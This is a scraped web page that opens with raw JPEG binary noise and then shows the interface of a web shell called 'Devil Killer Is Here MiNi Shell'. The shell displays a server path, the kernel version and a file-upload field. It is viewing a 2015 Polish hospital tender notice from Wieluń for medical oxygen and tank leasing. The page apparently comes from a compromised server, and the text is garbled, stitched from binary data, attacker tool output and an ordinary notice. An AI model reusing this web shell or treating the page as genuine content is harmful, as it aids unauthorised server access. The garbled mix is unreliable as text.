JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20151015/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20151015/273760-N-2015.html

<p class="kh_header"><b>Wieluń: Zakup z  dostawą  tlenu medycznego oraz dzierżawa zbiornika, butli i stacji redukcyjnej dla potrzeb SPZOZ w  Wieluniu</b><br>
<b>Numer ogłoszenia: 273760 - 2015; data zamieszczenia: 15.10.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej w Wieluniu , ul. Szpitalna 16, 98-300 Wieluń, woj. łódzkie, tel. +48 43 840 68 00, faks 43 840 68 01.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital.powiat.wielun.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup z  dostawą  tlenu medycznego oraz dzierżawa zbiornika, butli i stacji redukcyjnej dla potrzeb SPZOZ w  Wieluniu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.  Przedmiotem zamówienia jest:
1.1) cykliczna dostawa ciekłego tlenu medycznego w  ilości  320.000 kg,
1.2) dostawa, montaż, dzierżawa zbiornika kriogenicznego o  pojemności wodnej 5000 - 7000  litrów z parownicą, instalacją i armaturą, 
1.3) dostawa tlenu medycznego sprężonego  w  butlach o pojemności  6,4 m 3 oraz 1,6 m 3  w  ilości  4000 m3  wraz  z  dzierżawą  tych  butli-80 szt.,  
1.4)  dostawa, montaż i dzierżawa stacji redukcyjnej sprężonego tlenu medycznego,
1.5)  dostawa powietrza  sprężonego   w  butlach  o  pojemności   6,0 m 3  w  ilości  400 m3 wraz z  dzierżawą  tych  butli-10 szt.,					
1.6)  dostawa acetylenu w  butlach o pojemności 6 kg w  ilości  48  kg wraz z dzierżawą  butli-1 szt.
2.   Wymagania do tlenu medycznego:
2.1) Wykonawca musi zapewnić stałe, nieprzerywalne i pokrywające zapotrzebowanie Zamawiającego dostarczanie tlenu medycznego.
2.2) Wyżej podane ilości są szacunkowe, Zamawiający zastrzega sobie prawo do zamawiania jedynie ilości zgodnych z faktycznymi potrzebami, z zastrzeżeniem, że zmniejszenie zamówienia nie będzie większe niż 30% w stosunku do wartości - ilości określonej niniejszą umową.
2.3) Dostawy ciekłego tlenu medycznego będą realizowane sukcesywnie w ilości zgodnej  z zamówieniami złożonymi przez przedstawiciela Zamawiającego, w terminie  max 72 godziny.
2.4) Dostarczany  tlen medyczny musi spełniać wymagania monografii Farmakopei Europejskiej oraz posiadać wszystkie obowiązujące prawem dokumenty dopuszczające go do obrotu i stosowania jako produkt leczniczy.
2.5) Ciekły tlen medyczny dostarczany będzie transportem Wykonawcy do zbiornika kriogenicznego, którego lokalizację przewiduje się na  zapleczu Szpitala  obok  rozdzielni  tlenu, koszt transportu należy wliczyć w cenę tlenu. Zamawiający informuje, że posiada tam również rampę do rozładunku  butli z tlenem. Ponadto z uwagi na pewne różnice w wysokości terenu naszego Szpitala, w okresie np. zaśnieżenia dróg dojazdowych nie jest możliwe dostarczenie tlenu cysterną na ciągniku siodłowym, należy wtedy dostarczać tlen ciekły  samochodem z cysterną będącą  na jednej ramie nośnej. Zamawiający załącza  mapkę sytuacyjną terenu Szpitala z  lokalizacją tlenowni  oraz istniejących  dróg dojazdowych do niej, stanowiącą Załącznik do SIWZ.
3.   Wymagania do zbiornika kriogenicznego na ciekły tlen medyczny:
3.1)Zamawiający  oczekuje  oddania  w  dzierżawę  zbiornika  o  pojemności  od  5000 do  6000 litrów , gdyż  średnie  miesięczne  zapotrzebowanie  Szpitala  na  tlen  medyczny  ciekły wynosi  około  6000  kg.  Wykonawca  może  zaproponować  oddanie  w  dzierżawę  zbiornika  większego, do  7000  litrów,  lecz  musi  liczyć  się  z  obliczeniową   wytrzymałością  istniejącego  już  fundamentu. W  takim  przypadku  wskazane  byłoby   przeprowadzić  wizję  lokalną  na  terenie  istniejącej  tlenowni,  czy  oferowany  zbiornik   może  być  zainstalowany  w  przeznaczonym  do  tego  miejscu. 
3.2) Zbiornik  do  magazynowania  tlenu  ciekłego  ma być zlokalizowany  na  zapleczu Szpitala  obok  rozdzielni  tlenu, na  istniejącym  już  fundamencie  z  betonu  B 150 o   wymiarach  250 cm x 250 cm  oraz  głębokości  180 cm i  mocowany  na 4 śruby  M 24 . Na  powierzchni  23,30 m2, ograniczonej  istniejącym  już  ogrodzeniem  musi    stanąć  zbiornik  na  tlen  ciekły  oraz niezbędne  do  jego  prawidłowego  funkcjonowania   urządzenia. 
Istniejący  stan obiektów  obrazuje  rysunek  stanowiący  Załącznik do SIWZ.                      
3.3)  Zamawiający  oczekuje  od  Wykonawcy :   
a)	wykonania projektu posadowienia nowego zbiornika (jeżeli jest wymagany)  i uzyskania wszelkich pozwoleń budowlanych, jeżeli będą one prawem wymagane,  
b)	uzyskania dopuszczenia UDT do eksploatacji zbiornika,
c)	posadowienia nowego zbiornika  max  do dnia 15.01.2016 r. 
d)	dostarczenia wszelkiej dokumentacji techniczno - ruchowej, instrukcji obsługi, itp. niezbędnej do dalszej eksploatacji zbiornika (po jego montażu) 
e)	przeglądów zbiornika oraz instalacji pomocniczej, zgodnie z obowiązującymi przepisami (DTR), których koszt  zawarty jest w cenie czynszu dzierżawnego,
f)	przeszkolenia pracowników Zamawiającego w użytkowaniu zbiornika na ciekły tlen oraz jego instalacji,
g)  zagwarantowania właściwego stanu technicznego zbiornika przez cały okres eksploatacji przez Zamawiającego,
h)  zdemontowania i usunięcia zbiornika na własny koszt po zakończeniu trwania umowy z terenu Zamawiającego.		
3.4) Koszty  napraw  wszelkich  awarii  zbiornika  oraz  jego   urządzeń  pomocniczych wykonywanych  przez  cały  czas  związania  się  umową,   należą do Wykonawcy i mają  być  zawarte  w cenie czynszu dzierżawnego. Czas  oczekiwania  na  usunięcie  awarii  nie  może  przekraczać  48  godzin  od  chwili  jej  zgłoszenia.					                                                                           3.5)  Wykonawca  wykonuje  wszystkie  roboty  i  ponosi  całość nakładów  finansowych  związanych  z  montażem  nowego  zbiornika  oraz  wykonaniem niezbędnej  do  jego  funkcjonowania instalacji.
4. Wymagania dla dwustopniowej rezerwowej stacji redukcyjnej tlenu medycznego:      
4.1) Rezerwowa stacja redukcji tlenu medycznego wyposażona w dwustopniową redukcję ciśnienia    w butlach zlokalizowana ma być w istniejącym budynku rozdzielni tlenu. Istniejący  stan obrazuje  rysunek  stanowiący  Załącznik do SIWZ.   Zakres prac do wykonania:
       -  demontaż istniejącej stacji z instalacją;
       -  dostawa i montaż stacji o następujących parametrach i wyposażeniu:
a) automatyczna tablica redukcyjna I stopnia, dwustronna:
- wyposażona w panel sygnalizacyjno-alarmowy z optyczną sygnalizacją rampy pracującej oraz sygnalizacją alarmową rampy pustej tj. przy spadku ciśnienia poniżej 8 bar,
- zasilanie elektryczne napięciem 24 VDC (dotykobezpiecznym),
- nominalna wydajność reduktorów I stopnia min. 160 m3/h, 
- pomiędzy zaworem odcinającym a przed każdym z reduktorów I stopnia zintegrowane z tablicą filtry wysokociśnieniowe o porowatości max 70 ?m, zabezpieczające reduktory przed zanieczyszczeniami mechanicznymi,
- ciśnienie robocze tablicy redukcyjnej 20 MPa,
- automatyczne przełączanie ramp butlowych,
- wyposażona w zawory nadmiarowe o ciśnieniu otwarcia 1,25 MPa, zamontowane pomiędzy reduktorami I stopnia a przełącznikiem automatycznym,
- analogowe przetworniki ciśnienia wlotowego (w rampie butlowej) pozwalające wygenerować sygnały alarmowe w momencie spadku ciśnienia poniżej 0,8 MPa, 
- tablica wyposażona w zawory odcinające każdy z reduktorów umożliwiając prace konserwacyjne (np. demontaż) podczas prowadzenia ruchu stacji,
b) dwie rampy po 12 szt. butli każda; kolektory butlowe wyposażone w zawory wrzecionowe odcinające z funkcją zwrotną dla 24 butli oraz łączniki butlowe - 24 sztuki, 
c) reduktor II stopnia (sieciowy) umieszczony pod tablicą I stopnia o wydajności min. 190 m3/ h  z płynną regulacją ciśnienie wyjścia w zakresie 2,5 - 8 bar,
d) zintegrowany panel awaryjno-konserwacyjny umieszczony w stalowej zamykanej obudowie,  z zaworem odcinającym o średnicy min. DN20, wyposażony w złącze awaryjne typu NIST, 2 zawory nadmiarowe o wydajności 120 m3/h każdy, analogowy przetwornik ciśnienia w sieci zewnętrznej, manometr ciśnienia wyjściowego do sieci zewnętrznej tlenu, 
e) węzeł redukcyjny do zbiornika tlenu tj. tablica redukcyjna II stopnia wyposażona w dwa reduktory     o wydajności min. 190 m3/h, zabudowane w układzie by-pass, w komplecie z zaworami odcinającymi pozwalającymi na naprzemienną pracę reduktorów,
f) analogowy przetwornik ciśnienia w zbiorniku,
g) panel sygnalizacji alarmowej zbierający sygnały z wszystkich przetworników ciśnienia,  z możliwością ustawienia i regulacji progów alarmowych, z cyfrowym wyświetleniem wartości poszczególnych parametrów pracy stacji, 
h) osobne, dodatkowe wyjście ze stacji rezerwowej tlenu do sieci zewnętrznej, zakończone zaworem odcinającym o średnicy min. DN20.
4.2)  Wymienione komponenty powinny być oznaczone znakiem CE na zgodność z wymaganiami Dyrektywy Europejskiej 93/42/EEC o wyrobach medycznych jako kompletne urządzenia zgodnie ze specyfikacją zamieszczoną w poszczególnych punktach oraz zarejestrowane (lub co najmniej zgłoszone) w Urzędzie Rejestracji Produktów Leczniczych, Wyrobów Medycznych i Preparatów Biobójczych.  Wykonawca powinien potwierdzić to odpowiednimi dokumentami w ofercie. 
Układ połączeń zgodnie z PN-EN 7396-1:Systemy rurociągowe do gazów medycznych - Część I: Systemy rurociągowe do sprężonych gazów medycznych i próżni.Zamawiający wymaga dostawy fabrycznie nowych urządzeń stacji redukcyjnych. Ze względu na kluczową rolę zasilania w tlen medyczny nie dopuszcza się prefabrykatów poszczególnych komponentów. 
Nie dopuszcza się przełączania ramp butlowych za pomocą elektrozaworów. 
4.3)   W związku z faktem, że źródło zasilania jest integralnym elementem systemu rurociągowego do gazu medycznego Zamawiający wymaga, aby Wykonawca przedstawił w ofercie dokumenty potwierdzające stosowanie wymagań Dyrektywy Europejskiej 93/42/EEC o wyrobach medycznych, poświadczających posiadanie właściwych zasobów i przygotowania merytorycznego: 
- ustanowiony i utrzymywany system zarządzania jakością dla wyrobów medycznych zgodnie z normą EN ISO 13485:2003+AC:2007 w zakresie:Projektowanie i rozwój, wytwarzanie, instalowanie, dystrybucja i serwisowanie instalacji rurociągowych gazów medycznych i próżni: 
- certyfikat EC na Dyrektywę 93/42/EEC 
- wpis Instalacji szpitalnej gazów medycznych w Urzędzie Rejestracji Produktów Leczniczych, Wyrobów Medycznych i Produktów Biobójczych. 
Powyższe potwierdza znajomość wymagań Dyrektywy Europejskiej MDD 93/42/EEC wraz z normami zharmonizowanymi oraz narzuca obowiązek ich stosowania. Ponadto przedmiot zamówienia obejmuje projektowanie modernizacji istniejącej instalacji gazów medycznych w zakres którego wchodzi dobór oraz konfiguracja urządzeń stacji redukcji o odpowiednich parametrach. Powoduje to dodatkową odpowiedzialność i konieczność posiadania odpowiednich uprawnień gwarantujących Zamawiającemu stosowanie obowiązujących regulacji prawnych. 
Ze względu na powyższe Zamawiający wymaga, aby Wykonawca lub wskazany przez niego Podwykonawca posiadał i przedstawił w ofercie uprawnienia do wykonania instalacji gazów medycznych.
4.4)	Zamawiający  oczekuje  od  Wykonawcy :   
a)	wykonania projektu stacji (jeżeli jest on wymagany)  
b)	montażu urządzeń stacji redukcyjnej  max do dnia 05.01.2016 r. 
c)	dostarczenia wszelkiej dokumentacji techniczno - ruchowej, instrukcji obsługi, itp. niezbędnej 
       do dalszej eksploatacji stacji (po jej montażu), 
d)	przeglądów stacji, zgodnie z obowiązującymi przepisami (DTR), których koszt  zawarty jest    w cenie czynszu dzierżawnego,
e)	przeszkolenia pracowników Zamawiającego w użytkowaniu stacji,
f)	zagwarantowania właściwego stanu technicznego stacji przez cały okres eksploatacji przez Zamawiającego,	
g)  przekazania po 48 - miesięcznej dzierżawie całości urządzeń rezerwowej stacji  redukcji tlenu  medycznego nieodpłatnie na własność Zamawiającemu.		 
4.5)  Koszty napraw  wszelkich  awarii  stacji wykonywanych  przez  cały  czas  związania  umową,   należą  do obowiązków Wykonawcy i mają  być  zawarte  w cenie czynszu dzierżawnego. 		                    
4.6)   Wykonawca  wykonuje  wszystkie  roboty  i  ponosi  całość nakładów  finansowych  związanych  z  montażem  nowej stacji redukcji tlenu medycznego  oraz  wykonaniem niezbędnej  do  jej  funkcjonowania  instalacji..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 24.11.15.00-0, 24.11.19.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 48.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie niniejszego zamówienia mogą ubiegać się Wykonawcy, którzy posiadają zezwolenie na wytwarzanie produktu leczniczego - tlenu medycznego, jeżeli Wykonawca jest wytwórcą  oraz  zezwolenie na  prowadzenie obrotu produktem leczniczym - tlenem medycznym, jeżeli Wykonawca jest  dystrybutorem.
Zamawiający uzna, iż Wykonawca spełnia warunek posiadania uprawnień do wykonywania  działalności gospodarczej będącej przedmiotem niniejszego zamówienia po złożeniu przez Wykonawcę  wraz z ofertą :
- aktualnego zezwolenia na wytwarzanie produktu leczniczego - tlenu medycznego, jeżeli Wykonawca jest wytwórcą  oraz aktualnego zezwolenia  na prowadzenie obrotu produktami farmaceutycznymi - tlenem medycznym, jeżeli Wykonawca jest dystrybutorem i posiada podpisaną umowę z wytwórcą posiadającym zezwolenie na wytwarzanie na termin minimum 48 miesięcy od daty złożenia oferty; 
- aktualnego odpisu z właściwego rejestru KRS  lub  Rejestru Centralnej Ewidencji i  Informacji o  Działalności Gospodarczej Rzeczypospolitej Polskiej wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w oparciu o dokumenty i oświadczenia złożone przez Wykonawcę w niniejszym postępowaniu.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie niniejszego zamówienia mogą ubiegać się Wykonawcy, którzy posiadają dokumenty potwierdzające stosowanie wymagań Dyrektywy Europejskiej 93/42/EEC o wyrobach medycznych.Zamawiający uzna, iż Wykonawca spełnia warunek posiadania wiedzy i doświadczenia do wykonywania przedmiotu niniejszego zamówienia po złożeniu przez Wykonawcę  wraz z ofertą :
- certyfikatu poświadczającgo ustanowiony i utrzymywany system zarządzania jakością dla wyrobów medycznych zgodnie z normą EN ISO 13485:2003+AC:2007 w zakresie:Projektowanie i rozwój, wytwarzanie, instalowanie, dystrybucja i serwisowanie instalacji rurociągowych gazów medycznych i próżni, 
-certyfikatu EC na Dyrektywę 93/42/EEC 
- wpisu Instalacji szpitalnej gazów medycznych w Urzędzie Rejestracji Produktów Leczniczych, Wyrobów Medycznych i Produktów Biobójczych. 
Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w oparciu o dokumenty i oświadczenia złożone przez Wykonawcę w niniejszym postępowaniu.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie niniejszego zamówienia mogą ubiegać się Wykonawcy, którzy posiadają dokumenty potwierdzające stosowanie wymagań Dyrektywy Europejskiej 93/42/EEC o wyrobach medycznych. Dokumenty jak w pkt III.3.2).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie niniejszego zamówienia mogą ubiegać się Wykonawcy, którzy posiadają dokumenty potwierdzające stosowanie wymagań Dyrektywy Europejskiej 93/42/EEC o wyrobach medycznych. Dokumenty jak w pkt III.3.2).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie niniejszego zamówienia mogą ubiegać się Wykonawcy, którzy są  ubezpieczeni od odpowiedzialności cywilnej  w zakresie prowadzonej działalności gospodarczej na kwotę co najmniej 1.500.000,00 PLN. Zamawiający uzna, iż Wykonawca spełnia warunek odpowiedniej sytuacji ekonomicznej i finansowej  niezbędnej do realizacji niniejszego zamówienia - po złożeniu przez Wykonawcę  wraz z ofertą  opłaconej  polisy, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia (jeśli dowód opłacenia składki nie wynika z ww. dokumentu należy go również załączyć do oferty). W przypadku wskazania przez Wykonawców kwot w walucie innej niż złoty polski  (PLN), do przeliczenia na PLN wszystkich wartości i danych finansowych podanych w innych walutach,  Zamawiający zastosuje średni kurs Narodowego Banku Polskiego aktualny na dzień publikacji ogłoszenia o zamówieniu.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>W celu potwierdzenia, że oferowane dostawy odpowiadają wymaganiom określonym w niniejszej specyfikacji istotnych warunków zamówienia do oferty należy dołączyć następujące dokumenty: 
1) pozwolenie na dopuszczenie do obrotu tlenu medycznego potwierdzające jego zgodność z Farmakopeą Europejską wydane przez odpowiednie organy państwowe,
2)  schematy oferowanych: zbiornika kriogenicznego oraz stacji redukcji tlenu z urządzeniami  pomocniczymi i instalacjami  (nazwy, typy, parametry, itp.) - z  wszelkimi zapisami w języku polskim.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Termin płatności - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
